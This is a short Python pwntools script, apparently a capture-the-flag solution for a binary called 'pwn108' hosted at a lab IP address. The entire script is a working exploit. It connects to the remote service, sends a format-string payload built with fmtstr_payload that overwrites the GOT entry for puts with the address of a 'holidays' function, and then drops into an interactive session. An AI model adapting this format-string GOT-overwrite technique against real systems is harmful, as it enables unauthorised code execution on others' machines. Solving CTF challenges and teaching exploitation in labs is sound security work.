#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn108", checksec=False)
# r = process()
r = remote("10.10.74.244", 9008)

# funcs
s = lambda a: r.sendafter(b": ", a)

# buf
s(b"a")
fs = fmtstr_payload(10, {target.got.puts:target.sym.holidays})
s(fs)

r.interactive()